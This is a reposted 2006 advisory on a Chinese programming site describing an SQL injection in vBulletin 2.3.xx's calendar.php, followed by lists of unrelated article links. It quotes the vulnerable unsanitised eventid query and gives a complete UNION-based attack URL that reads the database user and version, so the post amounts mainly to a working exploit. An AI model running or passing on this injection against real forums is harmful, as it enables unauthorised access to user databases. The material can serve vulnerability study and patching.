编程 PHP

vBulletin Forum 2.3.xx SQL Injection

Posted in PHP onOctober 09, 2006

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

vBulletin Forum 2.3.xx SQL Injection

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

如何从一个php文件向另一个地址post数据，不用表单和隐藏的变量的

Mar 06 PHP

php判断上传的Excel文件中是否有图片及PHPExcel库认识

Jan 11 PHP

ThinkPHP惯例配置文件详解

Jul 14 PHP

php中实现记住密码下次自动登录的例子

Nov 06 PHP

PHP利用func_get_args和func_num_args函数实现函数重载实例

Nov 12 PHP

php中substr()函数参数说明及用法实例

Nov 15 PHP

php实现的SESSION类

Dec 02 PHP

php通过文件流方式复制文件的方法

Mar 13 PHP

PHP中异常处理的一些方法整理

Jul 03 PHP

PHP+mysql实现从数据库获取下拉树功能示例

Jan 06 PHP

利用 fsockopen() 函数开放端口扫描器的实例

Aug 19 PHP

解决windows上php xdebug 无法调试的问题

Feb 19 PHP

PHP_Flame(Version:Progress)的原代码

Oct 09 #PHP

图形数字验证代码

Oct 09 #PHP

用PHP函数解决SQL injection

Oct 09 #PHP

session 的生命周期是多长

Oct 09 #PHP

做个自己站内搜索引擎

Oct 09 #PHP

用libTemplate实现静态网页的生成

Oct 09 #PHP

php注入实例

Oct 09 #PHP

You might like

PHP安全性漫谈

2012/06/28 PHP

php实现redis数据库指定库号迁移的方法

2015/01/14 PHP

php防止网站被攻击的应急代码

2015/10/21 PHP

PHP实现表单提交数据的验证处理功能【防SQL注入和XSS攻击等】

2017/07/21 PHP

[原创]静态页面也可以实现预览列表不同的显示方式

2006/10/14 Javascript

2007/12/23更新创意无限,简单实用(javascript log)

2007/12/24 Javascript

javascript 函数调用规则

2009/08/26 Javascript

分别用marquee和div+js实现首尾相连循环滚动效果，仅3行代码

2011/09/21 Javascript

推荐40款强大的 jQuery 导航插件和教程(上篇)

2012/09/14 Javascript

JavaScript italics方法入门实例（把字符串显示为斜体）

2014/10/17 Javascript

nodejs教程之异步I/O

2014/11/21 NodeJs

60个很实用的jQuery代码开发技巧收集

2014/12/15 Javascript

微信JS接口大全

2016/08/25 Javascript

jquery实现页面加载效果

2017/02/21 Javascript

Node.js学习之地址解析模块URL的使用详解

2017/09/28 Javascript

Vue瀑布流插件的使用示例

2018/09/19 Javascript

解决vue+router路由跳转不起作用的一项原因

2020/07/19 Javascript

vue项目接口域名动态获取操作

2020/08/13 Javascript

vue+echarts实现中国地图流动效果(步骤详解)

2021/01/27 Vue.js

原生js 实现表单验证功能

2021/02/08 Javascript

[55:25]2018DOTA2亚洲邀请赛3月29日小组赛A组 VG VS OG

2018/03/30 DOTA

Python的Asyncore异步Socket模块及实现端口转发的例子

2016/06/14 Python

Python编写登陆接口的方法

2017/07/10 Python

解决PyCharm import torch包失败的问题

2018/10/13 Python

python3 深浅copy对比详解

2019/08/12 Python

Python Web静态服务器非堵塞模式实现方法示例

2019/11/21 Python

草莓网化妆品日本站：Strawberrynet日本

2017/10/20 全球购物

澳大利亚优质的家居用品和生活方式公司：Bed Bath N’ Table

2019/04/16 全球购物

解释下面关于J2EE的名词

2013/11/15 面试题

日语专业毕业生求职信

2013/12/04 职场文书

三年级科学教学反思

2014/01/29 职场文书

暑期教师培训方案

2014/06/07 职场文书

2014年机关党建工作总结

2014/11/11 职场文书

基层党建工作简报

2015/07/21 职场文书

学校少先队工作总结

2015/08/12 职场文书

导游词之江苏溱潼古镇

2019/11/27 职场文书